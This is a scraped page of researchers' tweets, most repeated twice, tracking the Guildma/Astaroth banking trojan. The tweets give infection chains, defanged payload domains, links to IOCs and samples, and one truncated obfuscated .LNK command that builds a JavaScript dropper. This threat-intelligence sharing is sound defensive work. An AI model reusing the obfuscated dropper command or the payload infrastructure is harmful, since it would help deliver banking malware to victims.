casual_malware(@casual_malware) 's Twitter Profile Photo

(req. BR ip & win10 useragent)
kadwfisahs.pecaswayne.com[.]br/BRF4J55RC20TABJZT08501N7WXR2E/NFS_E_39757-

.zip→.lnk→.js→bitsadmin→magic→guildma

tria.ge/reports/200304…
app.any.run/tasks/72046102… (force shutdown)
payload sites and files downloaded:

#malspam #guildma #astaroth (req. BR ip & win10 useragent)
kadwfisahs.pecaswayne.com[.]br/BRF4J55RC20TABJZT08501N7WXR2E/NFS_E_39757-

.zip→.lnk→.js→bitsadmin→magic→guildma

tria.ge/reports/200304…
app.any.run/tasks/72046102… (force shutdown)
payload sites and files downloaded:
account_circle
Merl(@Merlax_) 's Twitter Profile Photo

posible 🇧🇷 apuntando a 🇲🇽

- Chain: zip > lnk > js > autoit > rat
- Utiliza varios dominios *.sa.com para la descarga del stage de autoit
- 107 IPs/dominios relacionados

IOCs
pastebin.com/0NcwDbjv

Samples
bazaar.abuse.ch/user/953/

#Malware posible #Guildma 🇧🇷 apuntando a 🇲🇽

- Chain: zip > lnk > js > autoit > rat
- Utiliza varios dominios *.sa.com para la descarga del stage de autoit
- 107 IPs/dominios relacionados

IOCs
pastebin.com/0NcwDbjv

Samples
bazaar.abuse.ch/user/953/
account_circle
Germán Fernández(@1ZRR4H) 's Twitter Profile Photo

🎯 Hunting aka Infrastructure (1st stage):

Guildma abuses Google services to host the initial payload, furthermore, if the user are not from one of the whitelisted countries then they are redirected to download a Windows Service Pack (.ISO) from Microsoft's…

🎯 Hunting #Astaroth aka #Guildma Infrastructure (1st stage):

Guildma abuses Google services to host the initial payload, furthermore, if the user are not from one of the whitelisted countries then they are redirected to download a Windows Service Pack (.ISO) from Microsoft's…
account_circle
Bank Security(@Bank_Security) 's Twitter Profile Photo

Guildma: the Latin American Banking Trojan that targets Brazil 🇧🇷 exclusively.
welivesecurity.com/2020/03/05/gui…
All IOCs here:
pastebin.com/egtnGuJA

Guildma: the Latin American Banking Trojan that targets Brazil 🇧🇷 exclusively.
welivesecurity.com/2020/03/05/gui…
All IOCs here:
pastebin.com/egtnGuJA
#Guildma #Banking #Trojan #Malware
account_circle
Merl(@Merlax_) 's Twitter Profile Photo

- Infra 🇧🇷

- Mailers: 61 📩
- Downloaders: 76 ⬇️
- Algunas familias: Mekotio, Grandoreiro, Guildma

IOCs
pastebin.com/raw/yh2ePsr6

#Malware #Malspam - Infra 🇧🇷

- Mailers: 61 📩
- Downloaders: 76 ⬇️
- Algunas familias: Mekotio, Grandoreiro, Guildma

IOCs
pastebin.com/raw/yh2ePsr6
account_circle
Germán Fernández(@1ZRR4H) 's Twitter Profile Photo

1/ Interesante campaña de Malware 🇧🇷 (posiblemente aka ) dirigido a Chile y LATAM

URL > ZIP > LNK/CMD > WSCRIPT

- Geofenced + Blacklist vía IP y Cookies
- Download vía Cross-Site Scripting (XSS) y HTML5
- Wildcard DNS para rotación de subdominios (únicos)

1/ Interesante campaña de Malware 🇧🇷 (posiblemente #Guildma aka #Astaroth) dirigido a Chile y LATAM

URL > ZIP > LNK/CMD > WSCRIPT

- Geofenced + Blacklist vía IP y Cookies
- Download vía Cross-Site Scripting (XSS) y HTML5
- Wildcard DNS para rotación de subdominios (únicos)
account_circle
Germán Fernández(@1ZRR4H) 's Twitter Profile Photo

aka dirigido a 🇪🇸
Ahora desde sistemaoperacionalmundial[.]com (geofenced) alerta por Marc Almeidaˎˊ˗.

.LNK:

C:\Windows\System32\cONhosT.exe %COMSpeC% /V/D/c 'S^eT RBG=C:\xYNPTO\&& mD !RBG!>nul 2>&1&&S^eT ZBOA=!RBG!^DFDZPWBA.JS&&<nul set/p JMXH=var…

#Guildma aka #Astaroth dirigido a 🇪🇸
Ahora desde sistemaoperacionalmundial[.]com (geofenced) alerta por @cibernicola_es. 

.LNK:

C:\Windows\System32\cONhosT.exe %COMSpeC% /V/D/c 'S^eT RBG=C:\xYNPTO\&& mD !RBG!>nul  2>&1&&S^eT ZBOA=!RBG!^DFDZPWBA.JS&&<nul set/p  JMXH=var…
account_circle
Dodo on Security 🇵🇸 🇺🇦(@dodo_sec) 's Twitter Profile Photo

I've turned Xienim's string decrypter for Guildma into an Ida python script. Given the address of the decryption function and the key, it will decrypt most strings* and comment them next to where they're referenced
github.com/dodo-sec/Astar…

I've turned @Hachiman_Xienim's string decrypter for Guildma into an Ida python script. Given the address of the decryption function and the key, it will decrypt most strings* and comment them next to where they're referenced
github.com/dodo-sec/Astar…
account_circle
Bilgi Güvende(@BilgiGuvende) 's Twitter Profile Photo

Güvenlik araştırmacıları, Brezilya’nın ardından Latin Amerika ülkeleri ve Avrupa’ya yayılmış, Guildma, Javali, Melcoz ve Grandoreiro olarak bilinen dört adet bankacılık trojanı tespit edildiğini kaydetti.

bilgiguvende.com/brezilya-merke…

Güvenlik araştırmacıları, Brezilya’nın ardından Latin Amerika ülkeleri ve Avrupa’ya yayılmış, Guildma, Javali, Melcoz ve Grandoreiro olarak bilinen dört adet bankacılık trojanı tespit edildiğini kaydetti.
#BilgiGüvende #Brezilya #Trojan
bilgiguvende.com/brezilya-merke…
account_circle